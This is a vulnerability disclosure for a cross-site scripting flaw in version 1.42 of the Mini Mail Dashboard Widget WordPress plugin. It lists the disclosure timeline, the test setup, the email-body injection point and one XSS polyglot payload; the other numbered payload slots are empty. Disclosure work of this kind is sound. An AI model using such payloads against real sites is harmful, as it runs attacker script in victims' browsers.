#!/usr/bin/python ''' Author: loneferret of Offensive Security Product: Mini Mail Dashboard Widget Version: 1.42 Software Download: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/ Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 14 Jul 2012: Version 1.43 released 08 Aug 2012: Public Disclosure Installed On: Ubuntu Server LAMP 8.04 Wordpress: 3.3.1 Client Test OS: Window XP Pro SP3 (x86) Browser Used: Internet Explorer 8 Extra note: To execute the XSS, a user needs to click 'view in HTML' Injection Point: Body Injection Payload(s): 1: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{} 2: 3: 4: 5: